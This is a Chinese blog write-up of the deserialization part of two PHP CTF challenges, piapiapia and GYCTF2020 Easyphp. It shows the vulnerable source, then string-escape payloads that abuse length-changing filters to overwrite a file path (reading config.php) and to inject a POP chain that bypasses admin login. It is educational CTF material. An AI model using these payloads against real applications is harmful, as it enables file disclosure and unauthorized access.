php反序列化逃逸例题两道

已于 2024-10-05 12:24:20 修改
阅读量60 收藏
点赞数 1
文章标签: php 网络安全
于 2024-10-05 12:22:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59166557/article/details/142713117
版权

本文只讲反序列化部分,不包含解题全部流程

1 [0CTF 2016]piapiapia

先看漏洞点

profile.php

<?php  
    require_once('class.php');  
    if($_SESSION['username'] == null) {  
       die('Login First');      
    }  
    $username = $_SESSION['username'];  
    $profile=$user->show_profile($username);  
    if($profile  == null) {  
       header('Location: update.php');  
    }  
    else {  
       $profile = unserialize($profile);  
       $phone = $profile['phone'];  
       $email = $profile['email'];  
       $nickname = $profile['nickname'];  
       $photo = base64_encode(file_get_contents($profile['photo']));  
?>  
<!DOCTYPE html>  
<html>  
<head>  
   <title>Profile</title>  
   <link href="static/bootstrap.min.css" rel="stylesheet">  
   <script src="static/jquery.min.js"></script>  
   <script src="static/bootstrap.min.js"></script>  
</head>  
<body>  
    <div class="container" style="margin-top:100px">    
<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">  
       <h3>Hi <?php echo $nickname;?></h3>  
       <label>Phone: <?php echo $phone;?></label>  
       <label>Email: <?php echo $email;?></label>  
    </div></body>  
</html>  
<?php  
    }  
?>

漏洞点在

$profile = unserialize($profile);
$photo = base64_encode(file_get_contents($profile['photo']));

文件读取了先前存储的被序列化后的内容
那么如何控制$profile['photo']?
跟进show_profile

public function show_profile($username) {  
    $username = parent::filter($username);  
  
    $where = "username = '$username'";  
    $object = parent::select($this->table, $where);  
    return $object->profile;  
}

跟进filte

public function filter($string) {  
    $escape = array('\'', '\\\\');  
    $escape = '/' . implode('|', $escape) . '/';  
    $string = preg_replace($escape, '_', $string);  
  
    $safe = array('select', 'insert', 'update', 'delete', 'where');  
    $safe = '/' . implode('|', $safe) . '/i';  
    return preg_replace($safe, 'hacker', $string);  
}

这里我们发现,如果把where替换为hacker会多一个字符,但这有什么用呢?
我们来看这段代码

<?php  
$profile['phone'] = 'phone';  
$profile['email'] = 'email';  
$profile['nickname'] = 'nickname';  
$profile['photo'] = 'photo';  
echo(serialize($profile));
# a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:8:"nickname";s:5:"photo";s:5:"photo";}

如果我们构造

<?php  
$profile['phone'] = 'phone';  
$profile['email'] = 'email';  
$profile['nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';  
$profile['photo'] = 'photo';  
  
echo(serialize($profile));  

#a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";s:5:"photo";s:5:"photo";}

在正常情况下,这没什么问题,但是在这道题目中where会被替换为hacker而多一个字符

{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";s:5:"photo";s:5:"photo";}

{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}

成为了一个新的合法整体控制了photo的值

2 [GYCTF2020]Easyphp

<?php  
error_reporting(0);  
session_start();  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
        $mysqli=new dbCtrl();  
        $this->id=$mysqli->login('select id,password from user where username=?');  
        if($this->id){  
        $_SESSION['id']=$this->id;  
        $_SESSION['login']=1;  
        echo "你的ID是".$_SESSION['id'];  
        echo "你好!".$_SESSION['token'];  
        echo "<script>window.location.href='./update.php'</script>";  
        return $this->id;  
        }  
    }  
}  
    public function update(){  
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        //这个功能还没有写完 先占坑  
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);//危  
    }  
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
    public function __construct($newInfo,$sql){  
        $newInfo=unserialize($newInfo);  
        $upDate=new dbCtrl();  
    }  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
    public function __construct()  
    {  
        $this->name=$_POST['username'];  
        $this->password=$_POST['password'];  
        $this->token=$_SESSION['token'];  
    }  
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        //还没来得及写  
    }  
}

<?php  
require_once('lib.php');  
echo '<html>  
<meta charset="utf-8">  
<title>update</title>  
<h2>这是一个未完成的页面,上线时建议删除本页面</h2>  
</html>';  
if ($_SESSION['login']!=1){  
    echo "你还没有登陆呢!";  
}  
$users=new User();  
$users->update();  
if($_SESSION['login']===1){  
    require_once("flag.php");  
    echo $flag;  
}  
  
?>

先构造反序列化链

<?php  
error_reporting(0);  
session_start();  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
            $mysqli=new dbCtrl();  
            $this->id=$mysqli->login('select id,password from user where username=?');  
            if($this->id){  
                $_SESSION['id']=$this->id;  
                $_SESSION['login']=1;  
                echo "你的ID是".$_SESSION['id'];  
                echo "你好!".$_SESSION['token'];  
                echo "<script>window.location.href='./update.php'</script>";  
                return $this->id;  
            }  
        }  
    }  
    public function update(){  
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        //这个功能还没有写完 先占坑  
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);//危  
    }  
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
  
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        //还没来得及写  
    }  
}  
  
  
$pop = new UpdateHelper();  
$pop->sql = new user(); # echo $this->sql;触发__toString()调用$this->nickname->update($this->age);
$pop->sql->age = 'select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?';  
/*  
 *`SELECT 1, "c4ca4238a0b923820dcc509a6f75849b" FROM user WHERE username=?` 查询时,无论 `?` 替换成什么有效的用户名,只要该用户名存在于 `user` 表中,这条查询都会返回 `1` 和 `"c4ca4238a0b923820dcc509a6f75849b"`。  
  
c4ca4238a0b923820dcc509a6f75849b是1的MD5  
### 返回值说明:  
- **常量 `1`**: 这个值在查询中是固定的,无论查询条件如何,它都不会改变。  
- **固定字符串 `c4ca4238a0b923820dcc509a6f75849b`**: 这也是一个固定的返回值,不会根据用户输入而变化。  
  
### 查询结果:  
- 如果 `username` 存在,查询将返回这两个值。  
- 如果 `username` 不存在,则查询不会返回任何行。  
 */
$pop->sql->nickname = new Info();  # 然后触发Info的__call->echo $this->CtrlCase->login($argument[0]); 
$pop->sql->nickname->CtrlCase = new dbCtrl();  
#形成dbCtrl->login('select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?')
$pop->sql->nickname->CtrlCase->name= 'admin';  
$pop->sql->nickname->CtrlCase->password = '1';  
  
echo(urlencode(serialize($pop)));
# O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}

<?php  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
  
  
$pop = new Info('1','1');  
  
echo(urlencode(serialize($pop)));

# O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1:"1";s:8:"CtrlCase";N;}

<?php  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
  
  
$pop = new Info('1','unionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunion";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}');  
  
echo(urlencode(serialize($pop)));
#O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"unionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunion";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}

union会被替换为hacker,多了一个字符会变成

O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}

hacker的数量正好会变成1578个,导致原来被作为字符串的";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}
被解析造成逃逸

A5rZ
关注
PHP反序列化字符串逃逸
v2ish1yan的博客
04-15 1744
php反序列化字符串逃逸
反序列化字符串逃逸(上篇)
csjjjd的博客
01-21 1184
结果:O:4:"user":3:{s:8:"username";s:3:"BTG";这里BTG从0变成了1,说明你是污染成功了的,因为我的原代码里面写死了BTG是0的,现在变成了1,所以证明反序列化是成功了。其实就到这里就搞定了,如果不放心,那就var——dump,把反序列化输出出来,
PHP反序列化漏洞(详细篇)
wudideaqing的博客
06-13 895
序列化是指将数据结构或对象转换为一串字节流的过程,使其可以在存储、传输或缓存时进行持久化。反序列化是将数据从序列化的形式转换回其原始的数据结构或对象的过程。在PHP中,魔术方法(Magic Methods)是一组预定义的特殊方法,它们以双下划线(__)开头和结尾。这些方法会在对象的特定时刻自动调用,从而允许程序员在对象生命周期的不同阶段执行自定义操作。魔术方法使得在类中实现某些行为变得更加灵活和便捷。pop链就是利用了PHP中对象的自动调用魔术方法特性,将多个类和方法串联起来形成一个。
PHP反序列化漏洞(最全面最详细有例题)
m0_73728268的博客
04-14 2997
详细讲解PHP反序列化漏洞的基本原理及利用,由简入精,深入浅出;包含Docker环境搭建,例题解析;类与对象简介;序列化与反序列化基础知识;魔术方法原理及利用;POP链构造及解析;字符串逃逸;session反序列化,phar反序列化等;
php反序列化字符串逃逸
2301_80913334的博客
03-30 1414
字符增多逃逸:第一个字符串增多吐出多余代码,把多余位代码构造成逃逸的成员属性,构造出一个逃逸成员属性字符减少逃逸:第一个字符串减少吃掉有效代码,在第二个字符串构造代码,多逃逸出一个成员属性做题顺序:1、找目标;2、构造所需的有效代码;3、将构造出的有效代码作为值赋值给属性。
PHP反序列化字符逃逸详解
qq_45521281的博客
07-05 8162
文章目录第一种情况:替换修改后导致序列化字符串变长例题——[0CTF 2016]piapiapia第二种情况——替换之后导致序列化字符串变短实例——[安洵杯 2019]easy_serialize_php 此类题目的本质就是改变序列化字符串的长度,导致反序列化漏洞 这种题目有个共同点: php序列化后的字符串经过了替换或者修改,导致字符串长度发生变化。 总是先进行序列化,再进行替换修改操作。 第一种情况:替换修改后导致序列化字符串变长 示例代码: <?php function filter($st
php反序列化漏洞(万字详解)
永不落的梦想
07-26 4591
php反序列化万字文章详解,非常全面,并结合实际案例易于理解,包括pop链、字符串逃逸、session反序列化、phar反序列化、原生类的利用以及各种绕过方式。
php反序列化漏洞详解
apple_74953689的博客
07-26 763
以上代码在反序列化之后,会触发__destruct()魔术方法,该方法中有命令执行函数eval(),又因为反序列化生成的对象里的值,由反序列化里的值提供;**注意:**序列化之后长度s获取的字符串的长度一定为s,否则会继续往后读,并且unserialize会把多余的字符串当垃圾处理,在{}内的就是正确的,{}后面的就都被丢弃。3、而调用__call方法的前提是在对象上下文中调用不存在的方法,刚好__destruct方法调用了一个不存在的函数,而__destruct方法在对象被销毁时触发。
PHP反序列化漏洞+CTF实例
hyq99999的博客
08-09 884
整理php序列化相关知识点以及在CTF中的实例。
php反序列化逃逸1
08-03
在安全领域,PHP反序列化逃逸是一个重要的安全问题,因为不正确的处理序列化数据可能导致代码执行漏洞。以下是关于“php反序列化逃逸”的详细解释: 1. **反序列化分隔符**: PHP反序列化的结束标记是`;}`,这意味...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
深入浅析PHP的session反序列化漏洞问题
10-19
PHP的Session反序列化漏洞问题,主要是因为不当的Session使用和不安全的反序列化操作,可能造成未授权访问、数据泄露甚至远程代码执行等安全风险。 首先,了解PHP的Session管理机制是非常重要的。在php.ini配置文件...
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
最新发布
10-03 1403
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
PHP安装后Apache无法运行的问题
Bingyeshinvwang的博客
10-01 663
php安装之后,修改httpd.conf无法运行Apache的解决方案
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 1030
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
Github 2024-09-29 php开源项目日报 Top10
老孙正经胡说
09-29 966
根据Github Trendings的统计,今日(2024-09-29统计)共有10个项目上榜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值